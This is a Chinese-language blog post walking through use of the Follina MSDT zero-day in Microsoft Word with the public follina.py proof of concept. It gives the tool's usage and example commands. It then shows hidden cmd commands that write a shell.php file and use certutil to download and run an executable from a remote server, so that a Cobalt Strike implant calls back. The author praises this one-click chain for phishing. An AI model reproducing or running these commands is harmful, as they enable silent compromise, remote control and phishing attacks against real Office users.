微軟MSDT零日漏洞上線CS

發(fā)布時間 2022-06-02

一、漏洞簡介

近日,網(wǎng)絡安全研究員nao_sec發(fā)現(xiàn)了一個從白俄羅斯上傳至分析服務網(wǎng)站VirusTotal的惡意Word文檔(文件名為" 05-2022-0438.doc ")。這個文檔使用遠程模板特性獲取HTML,然后使用“ms-msdt”方案執(zhí)行PowerShell代碼。

隨后,知名網(wǎng)絡安全專家Kevin Beaumont發(fā)表了對該漏洞的分析?!霸撐臋n使用 Word遠程模板功能從遠程網(wǎng)絡服務器檢索HTML文件,該服務器又使用ms-msdt MSProtocol URI方案加載一些代碼并執(zhí)行一些 PowerShell”,在他的分析中這樣寫道,“這里發(fā)生的一些事情比較復雜,而首當其沖的問題是即使禁用了宏,Microsoft Word 也會通過msdt(一種支持工具)執(zhí)行代碼。受保護的視圖確實起了作用,可盡管如果您將文檔更改為RTF形式,它甚至無需打開文檔,僅通過資源管理器中的預覽選項卡即可運行,更不用說受保護的視圖了?!?/p>

二、影響范圍

據(jù)了解,該零日漏洞會影響多個Microsoft Office版本,包括Office、Office2016和Office 2021。

以上說明來源:https://www.freebuf.com/articles/334861.html

復現(xiàn)運行環(huán)境應該關閉防火墻殺毒軟件等安全應用,會被攔截;

POC來源地址:https://github.com/chvancooten/follina.py

三、使用說明

python .\follina.py -h
用法:follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] [-u URL] [-H HOST] [-p PORT]

選項:
  -h, --help 顯示此幫助信息并退出

所需參數(shù):
  -m {命令,二進制},--mode {命令,二進制}
                        執(zhí)行模式,可以是“二進制”以加載(遠程)二進制文件,或“命令”以運行編碼的 PS 命令

二進制執(zhí)行參數(shù):
  -b 二進制,--二進制二進制

命令執(zhí)行參數(shù):
  -c 命令,--command 命令
 在“命令”模式下執(zhí)行的編碼命令

可選參數(shù):
  -u URL, --url URL 生成的文檔應該在其中檢索您的有效負載的主機名或 IP 地址,默認為“l(fā)ocalhost”
  -H HOST, --host HOST Web服務器監(jiān)聽的接口,默認為所有接口(0.0.0.0)
  -p PORT, --port PORT 運行 HTTP 服務器的端口,默認為 80


使用舉例:

# 執(zhí)行本地二進制
python .\follina.py -m 二進制 -b \windows\system32\calc.exe

# 在 linux 上你可能需要轉義反斜杠
python .\follina.py -m 二進制 -b \\windows\\system32\\calc.exe

# 從文件共享中執(zhí)行二進制文件
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe

# 執(zhí)行任意powershell命令
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echoowned > c:\users\public\owned.txt'"

# 在默認接口(所有接口,0.0.0.0)上運行 Web 服務器,但告訴惡意文檔在 http://1.2.3.4/exploit.html 檢索它
python .\follina.py -m 二進制 -b \windows\system32\calc.exe -u 1.2.3.4

# 只在 localhost 上運行網(wǎng)絡服務器,在端口 8080 而不是 80
python .\follina.py -m 二進制 -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

四、環(huán)境配置

虛擬機Windows server 2019(請在測試環(huán)境運行)

OFFICE 2019專業(yè)版

關閉火絨等殺毒軟件、關閉Defender

五、上線過程

第一次運行會生成clickme.docx文件以及WWW文件夾,exploit.html文件就在WWW文件夾里面, -WindowStyle hidden -ArgumentList是靜默運行,所以看不到cmd界面,更加隱蔽。

命令:python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe   會彈出計算器,說明漏洞復現(xiàn)成功,如下:

1654055423_6296e1ffede076b4f7327.png


既然可以彈出計算器,我有一個思路,寫入shell文件或者執(zhí)行CMD,并執(zhí)行命令進行遠程服務器下載CS木馬運行,這樣就能夠達到點擊即上線,釣魚一絕(不考慮查殺原因)。

寫入shell.php

命令:python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo cmd_test > c:\users\public\shell.php'"  如下

1654054985_6296e049f211a589eb0f3.png

上線運行CS

命令:python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c certutil -urlcache -split -f http://127.0.0.1:8080/test.exe&start test.exe'"

1654060819_6296f713aaf8d16a70c56.png

六、總結

總體來說如果能夠解決報毒問題,該漏洞還是有較大的操作空間。